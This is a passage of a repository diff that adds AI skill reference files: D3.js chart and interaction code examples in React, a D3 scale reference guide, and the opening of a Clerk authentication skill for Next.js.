const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
const categories = Object.keys(data[0]).filter(k => k !== 'group');
|
||||
const stackedData = d3.stack().keys(categories)(data);
|
||||
|
||||
const xScale = d3.scaleBand()
|
||||
.domain(data.map(d => d.group))
|
||||
.range([0, innerWidth])
|
||||
.padding(0.1);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(stackedData[stackedData.length - 1], d => d[1])])
|
||||
.range([innerHeight, 0]);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
g.selectAll("g")
|
||||
.data(stackedData)
|
||||
.join("g")
|
||||
.attr("fill", (d, i) => colourScale(i))
|
||||
.selectAll("rect")
|
||||
.data(d => d)
|
||||
.join("rect")
|
||||
.attr("x", d => xScale(d.data.group))
|
||||
.attr("y", d => yScale(d[1]))
|
||||
.attr("height", d => yScale(d[0]) - yScale(d[1]))
|
||||
.attr("width", xScale.bandwidth());
|
||||
|
||||
g.append("g")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(d3.axisBottom(xScale));
|
||||
|
||||
g.append("g")
|
||||
.call(d3.axisLeft(yScale));
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Grouped bar chart
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
const categories = Object.keys(data[0]).filter(k => k !== 'group');
|
||||
|
||||
const x0Scale = d3.scaleBand()
|
||||
.domain(data.map(d => d.group))
|
||||
.range([0, innerWidth])
|
||||
.padding(0.1);
|
||||
|
||||
const x1Scale = d3.scaleBand()
|
||||
.domain(categories)
|
||||
.range([0, x0Scale.bandwidth()])
|
||||
.padding(0.05);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => Math.max(...categories.map(c => d[c])))])
|
||||
.range([innerHeight, 0]);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
const group = g.selectAll("g")
|
||||
.data(data)
|
||||
.join("g")
|
||||
.attr("transform", d => `translate(${x0Scale(d.group)},0)`);
|
||||
|
||||
group.selectAll("rect")
|
||||
.data(d => categories.map(key => ({ key, value: d[key] })))
|
||||
.join("rect")
|
||||
.attr("x", d => x1Scale(d.key))
|
||||
.attr("y", d => yScale(d.value))
|
||||
.attr("width", x1Scale.bandwidth())
|
||||
.attr("height", d => innerHeight - yScale(d.value))
|
||||
.attr("fill", d => colourScale(d.key));
|
||||
|
||||
g.append("g")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(d3.axisBottom(x0Scale));
|
||||
|
||||
g.append("g")
|
||||
.call(d3.axisLeft(yScale));
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Bubble chart
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 600;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
const xScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.x)])
|
||||
.range([0, innerWidth]);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.y)])
|
||||
.range([innerHeight, 0]);
|
||||
|
||||
const sizeScale = d3.scaleSqrt()
|
||||
.domain([0, d3.max(data, d => d.size)])
|
||||
.range([0, 50]);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
g.selectAll("circle")
|
||||
.data(data)
|
||||
.join("circle")
|
||||
.attr("cx", d => xScale(d.x))
|
||||
.attr("cy", d => yScale(d.y))
|
||||
.attr("r", d => sizeScale(d.size))
|
||||
.attr("fill", d => colourScale(d.category))
|
||||
.attr("opacity", 0.6)
|
||||
.attr("stroke", "white")
|
||||
.attr("stroke-width", 2);
|
||||
|
||||
g.append("g")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(d3.axisBottom(xScale));
|
||||
|
||||
g.append("g")
|
||||
.call(d3.axisLeft(yScale));
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
## Geographic visualisations
|
||||
|
||||
### Basic map with points
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!geoData || !pointData) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 600;
|
||||
|
||||
const projection = d3.geoMercator()
|
||||
.fitSize([width, height], geoData);
|
||||
|
||||
const pathGenerator = d3.geoPath().projection(projection);
|
||||
|
||||
// Draw map
|
||||
svg.selectAll("path")
|
||||
.data(geoData.features)
|
||||
.join("path")
|
||||
.attr("d", pathGenerator)
|
||||
.attr("fill", "#e0e0e0")
|
||||
.attr("stroke", "#999")
|
||||
.attr("stroke-width", 0.5);
|
||||
|
||||
// Draw points
|
||||
svg.selectAll("circle")
|
||||
.data(pointData)
|
||||
.join("circle")
|
||||
.attr("cx", d => projection([d.longitude, d.latitude])[0])
|
||||
.attr("cy", d => projection([d.longitude, d.latitude])[1])
|
||||
.attr("r", 5)
|
||||
.attr("fill", "steelblue")
|
||||
.attr("opacity", 0.7);
|
||||
|
||||
}, [geoData, pointData]);
|
||||
```
|
||||
|
||||
### Choropleth map
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!geoData || !valueData) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 600;
|
||||
|
||||
const projection = d3.geoMercator()
|
||||
.fitSize([width, height], geoData);
|
||||
|
||||
const pathGenerator = d3.geoPath().projection(projection);
|
||||
|
||||
// Create value lookup
|
||||
const valueLookup = new Map(valueData.map(d => [d.id, d.value]));
|
||||
|
||||
// Colour scale
|
||||
const colourScale = d3.scaleSequential(d3.interpolateBlues)
|
||||
.domain([0, d3.max(valueData, d => d.value)]);
|
||||
|
||||
svg.selectAll("path")
|
||||
.data(geoData.features)
|
||||
.join("path")
|
||||
.attr("d", pathGenerator)
|
||||
.attr("fill", d => {
|
||||
const value = valueLookup.get(d.id);
|
||||
return value ? colourScale(value) : "#e0e0e0";
|
||||
})
|
||||
.attr("stroke", "#999")
|
||||
.attr("stroke-width", 0.5);
|
||||
|
||||
}, [geoData, valueData]);
|
||||
```
|
||||
|
||||
## Advanced interactions
|
||||
|
||||
### Brush and zoom
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
const xScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.x)])
|
||||
.range([0, innerWidth]);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.y)])
|
||||
.range([innerHeight, 0]);
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
const circles = g.selectAll("circle")
|
||||
.data(data)
|
||||
.join("circle")
|
||||
.attr("cx", d => xScale(d.x))
|
||||
.attr("cy", d => yScale(d.y))
|
||||
.attr("r", 5)
|
||||
.attr("fill", "steelblue");
|
||||
|
||||
// Add brush
|
||||
const brush = d3.brush()
|
||||
.extent([[0, 0], [innerWidth, innerHeight]])
|
||||
.on("start brush", (event) => {
|
||||
if (!event.selection) return;
|
||||
|
||||
const [[x0, y0], [x1, y1]] = event.selection;
|
||||
|
||||
circles.attr("fill", d => {
|
||||
const cx = xScale(d.x);
|
||||
const cy = yScale(d.y);
|
||||
return (cx >= x0 && cx <= x1 && cy >= y0 && cy <= y1)
|
||||
? "orange"
|
||||
: "steelblue";
|
||||
});
|
||||
});
|
||||
|
||||
g.append("g")
|
||||
.attr("class", "brush")
|
||||
.call(brush);
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Linked brushing between charts
|
||||
|
||||
```javascript
|
||||
function LinkedCharts({ data }) {
|
||||
const [selectedPoints, setSelectedPoints] = useState(new Set());
|
||||
const svg1Ref = useRef();
|
||||
const svg2Ref = useRef();
|
||||
|
||||
useEffect(() => {
|
||||
// Chart 1: Scatter plot
|
||||
const svg1 = d3.select(svg1Ref.current);
|
||||
svg1.selectAll("*").remove();
|
||||
|
||||
// ... create first chart ...
|
||||
|
||||
const circles1 = svg1.selectAll("circle")
|
||||
.data(data)
|
||||
.join("circle")
|
||||
.attr("fill", d => selectedPoints.has(d.id) ? "orange" : "steelblue");
|
||||
|
||||
// Chart 2: Bar chart
|
||||
const svg2 = d3.select(svg2Ref.current);
|
||||
svg2.selectAll("*").remove();
|
||||
|
||||
// ... create second chart ...
|
||||
|
||||
const bars = svg2.selectAll("rect")
|
||||
.data(data)
|
||||
.join("rect")
|
||||
.attr("fill", d => selectedPoints.has(d.id) ? "orange" : "steelblue");
|
||||
|
||||
// Add brush to first chart
|
||||
const brush = d3.brush()
|
||||
.on("start brush end", (event) => {
|
||||
if (!event.selection) {
|
||||
setSelectedPoints(new Set());
|
||||
return;
|
||||
}
|
||||
|
||||
const [[x0, y0], [x1, y1]] = event.selection;
|
||||
const selected = new Set();
|
||||
|
||||
data.forEach(d => {
|
||||
const x = xScale(d.x);
|
||||
const y = yScale(d.y);
|
||||
if (x >= x0 && x <= x1 && y >= y0 && y <= y1) {
|
||||
selected.add(d.id);
|
||||
}
|
||||
});
|
||||
|
||||
setSelectedPoints(selected);
|
||||
});
|
||||
|
||||
svg1.append("g").call(brush);
|
||||
|
||||
}, [data, selectedPoints]);
|
||||
|
||||
return (
|
||||
<div>
|
||||
<svg ref={svg1Ref} width="400" height="300" />
|
||||
<svg ref={svg2Ref} width="400" height="300" />
|
||||
</div>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
## Animation patterns
|
||||
|
||||
### Enter, update, exit with transitions
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
|
||||
const circles = svg.selectAll("circle")
|
||||
.data(data, d => d.id); // Key function for object constancy
|
||||
|
||||
// EXIT: Remove old elements
|
||||
circles.exit()
|
||||
.transition()
|
||||
.duration(500)
|
||||
.attr("r", 0)
|
||||
.remove();
|
||||
|
||||
// UPDATE: Modify existing elements
|
||||
circles
|
||||
.transition()
|
||||
.duration(500)
|
||||
.attr("cx", d => xScale(d.x))
|
||||
.attr("cy", d => yScale(d.y))
|
||||
.attr("fill", "steelblue");
|
||||
|
||||
// ENTER: Add new elements
|
||||
circles.enter()
|
||||
.append("circle")
|
||||
.attr("cx", d => xScale(d.x))
|
||||
.attr("cy", d => yScale(d.y))
|
||||
.attr("r", 0)
|
||||
.attr("fill", "steelblue")
|
||||
.transition()
|
||||
.duration(500)
|
||||
.attr("r", 5);
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Path morphing
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data1 || !data2) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
|
||||
const line = d3.line()
|
||||
.x(d => xScale(d.x))
|
||||
.y(d => yScale(d.y))
|
||||
.curve(d3.curveMonotoneX);
|
||||
|
||||
const path = svg.select("path");
|
||||
|
||||
// Morph from data1 to data2
|
||||
path
|
||||
.datum(data1)
|
||||
.attr("d", line)
|
||||
.transition()
|
||||
.duration(1000)
|
||||
.attrTween("d", function() {
|
||||
const previous = d3.select(this).attr("d");
|
||||
const current = line(data2);
|
||||
return d3.interpolatePath(previous, current);
|
||||
});
|
||||
|
||||
}, [data1, data2]);
|
||||
```
|
||||
509
skills/claude-d3js-skill/references/scale-reference.md
Normal file
509
skills/claude-d3js-skill/references/scale-reference.md
Normal file
@@ -0,0 +1,509 @@
|
||||
# D3.js Scale Reference
|
||||
|
||||
Comprehensive guide to all d3 scale types with examples and use cases.
|
||||
|
||||
## Continuous scales
|
||||
|
||||
### Linear scale
|
||||
|
||||
Maps continuous input domain to continuous output range with linear interpolation.
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
|
||||
scale(50); // Returns 250
|
||||
scale(0); // Returns 0
|
||||
scale(100); // Returns 500
|
||||
|
||||
// Invert scale (get input from output)
|
||||
scale.invert(250); // Returns 50
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Most common scale for quantitative data
|
||||
- Axes, bar lengths, position encoding
|
||||
- Temperature, prices, counts, measurements
|
||||
|
||||
**Methods:**
|
||||
- `.domain([min, max])` - Set input domain
|
||||
- `.range([min, max])` - Set output range
|
||||
- `.invert(value)` - Get domain value from range value
|
||||
- `.clamp(true)` - Restrict output to range bounds
|
||||
- `.nice()` - Extend domain to nice round values
|
||||
|
||||
### Power scale
|
||||
|
||||
Maps continuous input to continuous output with exponential transformation.
|
||||
|
||||
```javascript
|
||||
const sqrtScale = d3.scalePow()
|
||||
.exponent(0.5) // Square root
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
|
||||
const squareScale = d3.scalePow()
|
||||
.exponent(2) // Square
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
|
||||
// Shorthand for square root
|
||||
const sqrtScale2 = d3.scaleSqrt()
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Perceptual scaling (human perception is non-linear)
|
||||
- Area encoding (use square root to map values to circle radii)
|
||||
- Emphasising differences in small or large values
|
||||
|
||||
### Logarithmic scale
|
||||
|
||||
Maps continuous input to continuous output with logarithmic transformation.
|
||||
|
||||
```javascript
|
||||
const logScale = d3.scaleLog()
|
||||
.domain([1, 1000]) // Must be positive
|
||||
.range([0, 500]);
|
||||
|
||||
logScale(1); // Returns 0
|
||||
logScale(10); // Returns ~167
|
||||
logScale(100); // Returns ~333
|
||||
logScale(1000); // Returns 500
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Data spanning multiple orders of magnitude
|
||||
- Population, GDP, wealth distributions
|
||||
- Logarithmic axes
|
||||
- Exponential growth visualisations
|
||||
|
||||
**Important:** Domain values must be strictly positive (>0).
|
||||
|
||||
### Time scale
|
||||
|
||||
Specialised linear scale for temporal data.
|
||||
|
||||
```javascript
|
||||
const timeScale = d3.scaleTime()
|
||||
.domain([new Date(2020, 0, 1), new Date(2024, 0, 1)])
|
||||
.range([0, 800]);
|
||||
|
||||
timeScale(new Date(2022, 0, 1)); // Returns 400
|
||||
|
||||
// Invert to get date
|
||||
timeScale.invert(400); // Returns Date object for mid-2022
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Time series visualisations
|
||||
- Timeline axes
|
||||
- Temporal animations
|
||||
- Date-based interactions
|
||||
|
||||
**Methods:**
|
||||
- `.nice()` - Extend domain to nice time intervals
|
||||
- `.ticks(count)` - Generate nicely-spaced tick values
|
||||
- All linear scale methods apply
|
||||
|
||||
### Quantize scale
|
||||
|
||||
Maps continuous input to discrete output buckets.
|
||||
|
||||
```javascript
|
||||
const quantizeScale = d3.scaleQuantize()
|
||||
.domain([0, 100])
|
||||
.range(['low', 'medium', 'high']);
|
||||
|
||||
quantizeScale(25); // Returns 'low'
|
||||
quantizeScale(50); // Returns 'medium'
|
||||
quantizeScale(75); // Returns 'high'
|
||||
|
||||
// Get the threshold values
|
||||
quantizeScale.thresholds(); // Returns [33.33, 66.67]
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Binning continuous data
|
||||
- Heat map colours
|
||||
- Risk categories (low/medium/high)
|
||||
- Age groups, income brackets
|
||||
|
||||
### Quantile scale
|
||||
|
||||
Maps continuous input to discrete output based on quantiles.
|
||||
|
||||
```javascript
|
||||
const quantileScale = d3.scaleQuantile()
|
||||
.domain([3, 6, 7, 8, 8, 10, 13, 15, 16, 20, 24]) // Sample data
|
||||
.range(['low', 'medium', 'high']);
|
||||
|
||||
quantileScale(8); // Returns based on quantile position
|
||||
quantileScale.quantiles(); // Returns quantile thresholds
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Equal-size groups regardless of distribution
|
||||
- Percentile-based categorisation
|
||||
- Handling skewed distributions
|
||||
|
||||
### Threshold scale
|
||||
|
||||
Maps continuous input to discrete output with custom thresholds.
|
||||
|
||||
```javascript
|
||||
const thresholdScale = d3.scaleThreshold()
|
||||
.domain([0, 10, 20])
|
||||
.range(['freezing', 'cold', 'warm', 'hot']);
|
||||
|
||||
thresholdScale(-5); // Returns 'freezing'
|
||||
thresholdScale(5); // Returns 'cold'
|
||||
thresholdScale(15); // Returns 'warm'
|
||||
thresholdScale(25); // Returns 'hot'
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Custom breakpoints
|
||||
- Grade boundaries (A, B, C, D, F)
|
||||
- Temperature categories
|
||||
- Air quality indices
|
||||
|
||||
## Sequential scales
|
||||
|
||||
### Sequential colour scale
|
||||
|
||||
Maps continuous input to continuous colour gradient.
|
||||
|
||||
```javascript
|
||||
const colourScale = d3.scaleSequential(d3.interpolateBlues)
|
||||
.domain([0, 100]);
|
||||
|
||||
colourScale(0); // Returns lightest blue
|
||||
colourScale(50); // Returns mid blue
|
||||
colourScale(100); // Returns darkest blue
|
||||
```
|
||||
|
||||
**Available interpolators:**
|
||||
|
||||
**Single hue:**
|
||||
- `d3.interpolateBlues`, `d3.interpolateGreens`, `d3.interpolateReds`
|
||||
- `d3.interpolateOranges`, `d3.interpolatePurples`, `d3.interpolateGreys`
|
||||
|
||||
**Multi-hue:**
|
||||
- `d3.interpolateViridis`, `d3.interpolateInferno`, `d3.interpolateMagma`
|
||||
- `d3.interpolatePlasma`, `d3.interpolateWarm`, `d3.interpolateCool`
|
||||
- `d3.interpolateCubehelixDefault`, `d3.interpolateTurbo`
|
||||
|
||||
**Use cases:**
|
||||
- Heat maps, choropleth maps
|
||||
- Continuous data visualisation
|
||||
- Temperature, elevation, density
|
||||
|
||||
### Diverging colour scale
|
||||
|
||||
Maps continuous input to diverging colour gradient with a midpoint.
|
||||
|
||||
```javascript
|
||||
const divergingScale = d3.scaleDiverging(d3.interpolateRdBu)
|
||||
.domain([-10, 0, 10]);
|
||||
|
||||
divergingScale(-10); // Returns red
|
||||
divergingScale(0); // Returns white/neutral
|
||||
divergingScale(10); // Returns blue
|
||||
```
|
||||
|
||||
**Available interpolators:**
|
||||
- `d3.interpolateRdBu` - Red to blue
|
||||
- `d3.interpolateRdYlBu` - Red, yellow, blue
|
||||
- `d3.interpolateRdYlGn` - Red, yellow, green
|
||||
- `d3.interpolatePiYG` - Pink, yellow, green
|
||||
- `d3.interpolateBrBG` - Brown, blue-green
|
||||
- `d3.interpolatePRGn` - Purple, green
|
||||
- `d3.interpolatePuOr` - Purple, orange
|
||||
- `d3.interpolateRdGy` - Red, grey
|
||||
- `d3.interpolateSpectral` - Rainbow spectrum
|
||||
|
||||
**Use cases:**
|
||||
- Data with meaningful midpoint (zero, average, neutral)
|
||||
- Positive/negative values
|
||||
- Above/below comparisons
|
||||
- Correlation matrices
|
||||
|
||||
### Sequential quantile scale
|
||||
|
||||
Combines sequential colour with quantile mapping.
|
||||
|
||||
```javascript
|
||||
const sequentialQuantileScale = d3.scaleSequentialQuantile(d3.interpolateBlues)
|
||||
.domain([3, 6, 7, 8, 8, 10, 13, 15, 16, 20, 24]);
|
||||
|
||||
// Maps based on quantile position
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Perceptually uniform binning
|
||||
- Handling outliers
|
||||
- Skewed distributions
|
||||
|
||||
## Ordinal scales
|
||||
|
||||
### Band scale
|
||||
|
||||
Maps discrete input to continuous bands (rectangles) with optional padding.
|
||||
|
||||
```javascript
|
||||
const bandScale = d3.scaleBand()
|
||||
.domain(['A', 'B', 'C', 'D'])
|
||||
.range([0, 400])
|
||||
.padding(0.1);
|
||||
|
||||
bandScale('A'); // Returns start position (e.g., 0)
|
||||
bandScale('B'); // Returns start position (e.g., 110)
|
||||
bandScale.bandwidth(); // Returns width of each band (e.g., 95)
|
||||
bandScale.step(); // Returns total step including padding
|
||||
bandScale.paddingInner(); // Returns inner padding (between bands)
|
||||
bandScale.paddingOuter(); // Returns outer padding (at edges)
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Bar charts (most common use case)
|
||||
- Grouped elements
|
||||
- Categorical axes
|
||||
- Heat map cells
|
||||
|
||||
**Padding options:**
|
||||
- `.padding(value)` - Sets both inner and outer padding (0-1)
|
||||
- `.paddingInner(value)` - Padding between bands (0-1)
|
||||
- `.paddingOuter(value)` - Padding at edges (0-1)
|
||||
- `.align(value)` - Alignment of bands (0-1, default 0.5)
|
||||
|
||||
### Point scale
|
||||
|
||||
Maps discrete input to continuous points (no width).
|
||||
|
||||
```javascript
|
||||
const pointScale = d3.scalePoint()
|
||||
.domain(['A', 'B', 'C', 'D'])
|
||||
.range([0, 400])
|
||||
.padding(0.5);
|
||||
|
||||
pointScale('A'); // Returns position (e.g., 50)
|
||||
pointScale('B'); // Returns position (e.g., 150)
|
||||
pointScale('C'); // Returns position (e.g., 250)
|
||||
pointScale('D'); // Returns position (e.g., 350)
|
||||
pointScale.step(); // Returns distance between points
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Line chart categorical x-axis
|
||||
- Scatter plot with categorical axis
|
||||
- Node positions in network graphs
|
||||
- Any point positioning for categories
|
||||
|
||||
### Ordinal colour scale
|
||||
|
||||
Maps discrete input to discrete output (colours, shapes, etc.).
|
||||
|
||||
```javascript
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
colourScale('apples'); // Returns first colour
|
||||
colourScale('oranges'); // Returns second colour
|
||||
colourScale('apples'); // Returns same first colour (consistent)
|
||||
|
||||
// Custom range
|
||||
const customScale = d3.scaleOrdinal()
|
||||
.domain(['cat1', 'cat2', 'cat3'])
|
||||
.range(['#FF6B6B', '#4ECDC4', '#45B7D1']);
|
||||
```
|
||||
|
||||
**Built-in colour schemes:**
|
||||
|
||||
**Categorical:**
|
||||
- `d3.schemeCategory10` - 10 colours
|
||||
- `d3.schemeAccent` - 8 colours
|
||||
- `d3.schemeDark2` - 8 colours
|
||||
- `d3.schemePaired` - 12 colours
|
||||
- `d3.schemePastel1` - 9 colours
|
||||
- `d3.schemePastel2` - 8 colours
|
||||
- `d3.schemeSet1` - 9 colours
|
||||
- `d3.schemeSet2` - 8 colours
|
||||
- `d3.schemeSet3` - 12 colours
|
||||
- `d3.schemeTableau10` - 10 colours
|
||||
|
||||
**Use cases:**
|
||||
- Category colours
|
||||
- Legend items
|
||||
- Multi-series charts
|
||||
- Network node types
|
||||
|
||||
## Scale utilities
|
||||
|
||||
### Nice domain
|
||||
|
||||
Extend domain to nice round values.
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0.201, 0.996])
|
||||
.nice();
|
||||
|
||||
scale.domain(); // Returns [0.2, 1.0]
|
||||
|
||||
// With count (approximate tick count)
|
||||
const scale2 = d3.scaleLinear()
|
||||
.domain([0.201, 0.996])
|
||||
.nice(5);
|
||||
```
|
||||
|
||||
### Clamping
|
||||
|
||||
Restrict output to range bounds.
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range([0, 500])
|
||||
.clamp(true);
|
||||
|
||||
scale(-10); // Returns 0 (clamped)
|
||||
scale(150); // Returns 500 (clamped)
|
||||
```
|
||||
|
||||
### Copy scales
|
||||
|
||||
Create independent copies.
|
||||
|
||||
```javascript
|
||||
const scale1 = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
|
||||
const scale2 = scale1.copy();
|
||||
// scale2 is independent of scale1
|
||||
```
|
||||
|
||||
### Tick generation
|
||||
|
||||
Generate nice tick values for axes.
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
|
||||
scale.ticks(10); // Generate ~10 ticks
|
||||
scale.tickFormat(10); // Get format function for ticks
|
||||
scale.tickFormat(10, ".2f"); // Custom format (2 decimal places)
|
||||
|
||||
// Time scale ticks
|
||||
const timeScale = d3.scaleTime()
|
||||
.domain([new Date(2020, 0, 1), new Date(2024, 0, 1)]);
|
||||
|
||||
timeScale.ticks(d3.timeYear); // Yearly ticks
|
||||
timeScale.ticks(d3.timeMonth, 3); // Every 3 months
|
||||
timeScale.tickFormat(5, "%Y-%m"); // Format as year-month
|
||||
```
|
||||
|
||||
## Colour spaces and interpolation
|
||||
|
||||
### RGB interpolation
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range(["blue", "red"]);
|
||||
// Default: RGB interpolation
|
||||
```
|
||||
|
||||
### HSL interpolation
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range(["blue", "red"])
|
||||
.interpolate(d3.interpolateHsl);
|
||||
// Smoother colour transitions
|
||||
```
|
||||
|
||||
### Lab interpolation
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range(["blue", "red"])
|
||||
.interpolate(d3.interpolateLab);
|
||||
// Perceptually uniform
|
||||
```
|
||||
|
||||
### HCL interpolation
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range(["blue", "red"])
|
||||
.interpolate(d3.interpolateHcl);
|
||||
// Perceptually uniform with hue
|
||||
```
|
||||
|
||||
## Common patterns
|
||||
|
||||
### Diverging scale with custom midpoint
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([min, midpoint, max])
|
||||
.range(["red", "white", "blue"])
|
||||
.interpolate(d3.interpolateHcl);
|
||||
```
|
||||
|
||||
### Multi-stop gradient scale
|
||||
|
||||
```javascript
|
||||
const scale = d3.scaleLinear()
|
||||
.domain([0, 25, 50, 75, 100])
|
||||
.range(["#d53e4f", "#fc8d59", "#fee08b", "#e6f598", "#66c2a5"]);
|
||||
```
|
||||
|
||||
### Radius scale for circles (perceptual)
|
||||
|
||||
```javascript
|
||||
const radiusScale = d3.scaleSqrt()
|
||||
.domain([0, d3.max(data, d => d.value)])
|
||||
.range([0, 50]);
|
||||
|
||||
// Use with circles
|
||||
circle.attr("r", d => radiusScale(d.value));
|
||||
```
|
||||
|
||||
### Adaptive scale based on data range
|
||||
|
||||
```javascript
|
||||
function createAdaptiveScale(data) {
|
||||
const extent = d3.extent(data);
|
||||
const range = extent[1] - extent[0];
|
||||
|
||||
// Use log scale if data spans >2 orders of magnitude
|
||||
if (extent[1] / extent[0] > 100) {
|
||||
return d3.scaleLog()
|
||||
.domain(extent)
|
||||
.range([0, width]);
|
||||
}
|
||||
|
||||
// Otherwise use linear
|
||||
return d3.scaleLinear()
|
||||
.domain(extent)
|
||||
.range([0, width]);
|
||||
}
|
||||
```
|
||||
|
||||
### Colour scale with explicit categories
|
||||
|
||||
```javascript
|
||||
const colourScale = d3.scaleOrdinal()
|
||||
.domain(['Low Risk', 'Medium Risk', 'High Risk'])
|
||||
.range(['#2ecc71', '#f39c12', '#e74c3c'])
|
||||
.unknown('#95a5a6'); // Fallback for unknown values
|
||||
```
|
||||
56
skills/clerk-auth/SKILL.md
Normal file
56
skills/clerk-auth/SKILL.md
Normal file
@@ -0,0 +1,56 @@
|
||||
---
|
||||
name: clerk-auth
|
||||
description: "Expert patterns for Clerk auth implementation, middleware, organizations, webhooks, and user sync Use when: adding authentication, clerk auth, user authentication, sign in, sign up."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Clerk Authentication
|
||||
|
||||
## Patterns
|
||||
|
||||
### Next.js App Router Setup
|
||||
|
||||
Complete Clerk setup for Next.js 14/15 App Router.
|
||||
|
||||
Includes ClerkProvider, environment variables, and basic
|
||||
sign-in/sign-up components.
|
||||
|
||||
Key components:
|
||||
- ClerkProvider: Wraps app for auth context
|
||||
- <SignIn />, <SignUp />: Pre-built auth forms
|
||||
- <UserButton />: User menu with session management
|
||||
|
||||
|
||||
### Middleware Route Protection
|
||||
|
||||
Protect routes using clerkMiddleware and createRouteMatcher.
|
||||
|
||||
Best practices:
|
||||
- Single middleware.ts file at project root
|
||||
- Use createRouteMatcher for route groups
|
||||
- auth.protect() for explicit protection
|
||||
